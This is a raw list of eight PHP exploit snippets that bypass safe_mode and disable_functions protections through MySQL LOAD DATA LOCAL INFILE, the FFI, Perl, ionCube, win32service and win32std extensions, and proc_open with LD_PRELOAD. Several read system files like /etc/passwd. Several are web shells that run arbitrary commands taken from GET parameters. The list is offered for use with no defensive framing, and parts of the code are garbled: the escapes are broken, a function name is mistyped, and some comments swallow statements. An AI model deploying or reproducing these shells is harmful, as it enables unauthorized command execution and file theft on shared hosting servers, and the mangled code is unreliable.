1- PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability
<?php
file_get_contents('/etc/passwd');
$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))"); mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'"); mysql_close($l);
mysql_connect("localhost", "aaaa");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);
?>
2- MySQL
<?php
function r($fp, &$buf, $len, &$err) {
print fread($fp, $len);
}
$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $m->close();
?>
3- PHP FFI Extension Safe_mode Bypass Exploit
<?php
if(!extension_loaded('ffi'))
die('ERROR: FFI extension is not loaded!');
$command=(empty($_GET['cmd']))?'dir':$_GET['cmd']; if(is_writeable(dirname(__FILE__)))
$tmp=dirname(__ FILE__); elseif(is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path'); elseif(is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
else die('ERROR: Move exploit to writeable folder.'); $output="$tmp\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >"$output"",0); while(!file_exists($output))sleep(1);
$con=''; $fp=fopen($output,'r'); while(!feof($fp))$con.=fgets($fp,1024); fclose($fp); $con=htmlspecialchars($con);
echo "<pre>$con</pre>";
unlink($output);
?>
4- PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypas
<?php
if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
$path = str_repeat("..\", 20);
$MyBoot_readfile = readfile($path."windows\system.ini");
#just to be sure that I set correctely disable_function
$MyBoot_ioncube = ioncube_read_file($path."boot.ini"); echo $MyBoot_readfile; echo "<br><br>ionCube output:<br><br>"; echo $MyBoot_ioncube; ?>
5 – PHP Perl Extension Safe_mode Bypass
<?php
if(!extension_loaded('perl'))die('perl extension is not loaded'); if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls ';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "</textarea>";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>"
?>
6- PHP 5.x (win32service) Local Safe Mode Bypass Exploit
<?php
$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir';
#cammand
$dir=ini_get('upload_tmp_dir');
#Directory to store command's output if(!extension_loaded('win32service'))die('win32ser vice extension not found!');
$name=$dir."\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\windows\system32\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >"$name""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
$exec=file_get_contents($name);
unlink($name);
echo "<pre>".htmlspecialchars($exec)."</pre>";
?>
7 – PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
<?php
if (!extension_loaded("win32std")) die("win32std extension required!"); system("cmd.exe");
//just to be sure that protections work well win_shell_execute("..\..\..\..\windows\system32\cmd.exe");
?>
8- PHP safe_mode Bypass via proc_open() and custom environmen
<?php
$path="/var/www";
//change to your writable path
$a=open($path."/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
$descriptorspec = array( 0--> array("pipe", "r"), 1 => array("file", $path."/output.txt","w"), 2 => array("file", $path."/errors.txt", "a" ) );
$cwd = '.';
$env = array('LD_PRELOAD' => $path."/a.so");
$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env);
// example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r");
echo "<strong>";
while (!feof($a)) {$b=fgets($a);echo $b;} fclose($a);
?>